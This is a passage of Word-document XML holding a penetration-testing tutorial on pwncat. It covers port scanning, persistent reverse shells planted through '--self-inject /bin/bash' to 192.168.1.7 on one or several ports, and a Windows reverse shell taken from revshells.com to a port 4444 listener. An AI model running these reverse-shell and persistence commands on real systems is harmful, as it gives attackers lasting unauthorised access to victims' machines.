          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C63733B" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> --banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E488803" w14:textId="1897C36E"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D15FE49" wp14:editId="318363C8">
            <wp:extent cx="5731510" cy="227076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270760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F968BF1" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> not only performs port scanning on TCP ports it can also scan UDP ports just by using a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> flag in the above command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8386E0" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>As a Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA0F8D" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">When used as a listener </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> holds a persistence by creating a file in the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/ directory. Therefore, if a connection is lost the reverse shell can still be obtained at the same port which was previously used like a persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D935556" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> --self-inject /bin/bash:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="083D982A" w14:textId="791C27CE"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FC8EA13" wp14:editId="6381796D">
            <wp:extent cx="5570855" cy="88633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0855" cy="8863330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E034785" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The persistence can be checked by running a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>rlwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener at the same port after terminating the above connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB7F01" w14:textId="5DDE6430"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79C88D2D" wp14:editId="4878D05D">
            <wp:extent cx="5731510" cy="16586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658620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3F9FD" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a feature to create persistence on multiple ports which can be performed using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA5AB1" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> --self-inject /bin/bash:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E3614D7" w14:textId="737CC74C"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DDCF2FB" wp14:editId="3F56796B">
            <wp:extent cx="5731510" cy="638556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6385560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA3C18" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>It can be observed that along with port 1234, the reverse shell can also be obtained on the ports 1235 and 1236.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48704334" w14:textId="6B6688A8"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="406255EF" wp14:editId="004ED5A3">
            <wp:extent cx="5731510" cy="739521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7395210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CEFDAE" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Reverse Shell (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6C33E" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>To get a reverse shell, command can be used from the reverse shell generator (</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
            <w:color w:val="0000FF"/>
          </w:rPr>
          <w:t>https://www.revshells.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)  in the Windows machine to get a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD02DA" w14:textId="39BF77A3"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="178787FF" wp14:editId="0EDFC619">
            <wp:extent cx="5731510" cy="56972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5697220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC36387" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Before executing the command copied from the revshells.com, start a listener at port 4444 in the kali machine using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECDEF1C" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5AE06E" w14:textId="08218103"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4578F0C4" wp14:editId="070C90F3">
            <wp:extent cx="5731510" cy="182372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823720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
